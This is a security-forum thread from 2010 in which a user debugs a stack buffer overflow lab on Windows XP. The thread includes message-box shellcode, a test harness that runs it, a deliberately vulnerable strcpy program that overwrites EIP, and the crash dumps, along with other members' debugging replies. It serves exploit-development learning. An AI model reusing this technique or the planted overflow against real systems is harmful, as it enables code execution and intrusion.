• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

[Win XP Pro SP3/Cygwin] Payload/shellcode not executing

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More

View previous topic :: View next topic  
Author Message
draggy
Just Arrived
Just Arrived


Joined: 25 Nov 2004
Posts: 0


Offline

PostPosted: Mon Sep 06, 2010 7:16 am    Post subject: [Win XP Pro SP3/Cygwin] Payload/shellcode not executing Reply with quote

Hello people,

The payload/shellcode that reside in my array won't execute or hang after the saved EIP on the stack was overwrite with array address.

Here is my payload which is typically display a message box:

msgbox.c:

Code:

#include <stdio.h>

char shellcode[] =    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
         "\x51\x68\x6c\x6c\x20\x20\x68\x33"
         "\x32\x2e\x64\x68\x75\x73\x65\x72"
         "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
         "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
         "\xc1\x11\x11\x11\x11\x51\x68\x61"
         "\x67\x65\x42\x68\x4d\x65\x73\x73"
         "\x89\xe1\x51\x50\xbb\x40\xae\x80"
         "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
         "\x51\x51\x52\xff\xd0\x31\xc0\x50"
         "\xb8\x12\xcb\x81\x7c\xff\xd0";

int main(void)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %d\n", strlen(shellcode));
           printf("Shellcode sizeof is : %d\n", sizeof(shellcode)/sizeof(char));
   (int)(*func)();
   
        return 0;
}


Here is the problem:

vul.c:

Code:

#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <string.h>

char shellcode[] =    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
         "\x51\x68\x6c\x6c\x20\x20\x68\x33"
         "\x32\x2e\x64\x68\x75\x73\x65\x72"
         "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
         "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
         "\xc1\x11\x11\x11\x11\x51\x68\x61"
         "\x67\x65\x42\x68\x4d\x65\x73\x73"
         "\x89\xe1\x51\x50\xbb\x40\xae\x80"
         "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
         "\x51\x51\x52\xff\xd0\x31\xc0\x50"
         "\xb8\x12\xcb\x81\x7c\xff\xd0";
         "BBBB"                     //overwrite EBP
         "\xd1\xcc\x22\x00"; //overwrite EIP with function2()'s c array address
               
               
void function2(void)
{
   char c[87];
   
   printf("Address c = %p and value = %x\n", (void *) (&c[0]), c[0]);
   
   strcpy(c, shellcode);
}

int main(void)
{
   printf("function 2 address = %p\n", (void *) (function2));
   
   function2();
   
   return 0;
}


and the undesired output:

Code:

$ uname -a
CYGWIN_NT-5.1 changeme 1.7.7(0.230/5/3) 2010-08-31 09:58 i686 Cygwin

$ ./vul
function 2 address = 0x4011a0
Address c = 0x22ccd1 and value = 1d
Segmentation fault (core dumped)

$ cat vul.exe.stackdump
Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3
eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64
ebp=42424242 esp=0022CD20 program=C:\exploit\vul\vul.exe, pid 924, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
Stack trace:
Frame     Function  Args
      3 [main] vul 924 exception::handle: Error while dumping state (probably corrupted stack)


Does the Data Execution Prevention (DEP) on Windows XP Pro SP3 preventing the payload from executing after the EIP has been overwrite with the function2()'s "c" array address on the Cygwin environment?
Back to top
View user's profile Send private message
draggy
Just Arrived
Just Arrived


Joined: 25 Nov 2004
Posts: 0


Offline

PostPosted: Mon Sep 06, 2010 5:59 pm    Post subject: Reply with quote

Update:

Turning off and on the DEP doesn't help in this situation.

I found that when I overwrite the saved EIP with the global variable "shellcode" address, the payload/shellcode will execute completely.

I wonder why it was not working when I overwrite the saved EIP with the function2's local variable "c" address.

Thank
Back to top
View user's profile Send private message
alt.don
SF Boss
SF Boss


Joined: 04 Mar 2003
Posts: 16777079


Offline

PostPosted: Mon Sep 06, 2010 10:41 pm    Post subject: Reply with quote

Hello draggy,

There are many variables at play here which could have affected one lab test over another. I would suggest you write exactly what your lab environment was and we can then help troubleshoot it somewhat better.

--Don
Back to top
View user's profile Send private message Visit poster's website
Fire Ant
Trusted SF Member
Trusted SF Member


Joined: 27 Jun 2008
Posts: 3
Location: London

Offline

PostPosted: Tue Sep 07, 2010 9:16 am    Post subject: Reply with quote

draggy,

Did you check out the error message? It seems you have overwritten EBX rather than EIP.

eip=0022CCF3
ebp=42424242

Fire Ant
Back to top
View user's profile Send private message
draggy
Just Arrived
Just Arrived


Joined: 25 Nov 2004
Posts: 0


Offline

PostPosted: Tue Sep 07, 2010 11:20 am    Post subject: Reply with quote

Hello Don and Fireant,

Thank you for reply and come to aid me Very Happy

Hello Don,

The program was develop and tested on virtual machine environment (VMWare x86 -> 32 bits) Cygwin v 1.7.7 under Windows XP Pro SP3 platform. By the way, there is AVG (anti-virus) installed.

Hello Fireant,

ebp=42424242 == "\x42\x42\x42\x42" == "BBBB" right? (ascii table)

eip=0022CCF3 -> ""\xd1\xcc\x22\x00" == 0022CCD1 -> 0022CCF3 - 0022CCD1 = 22 (decimal is 34 bytes)

This mean the shellcode was executed till 33/34 bytes from 0x0022CCD1 (function2's local "c" array address) and it stop, plus it got dump.

Thanks
Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register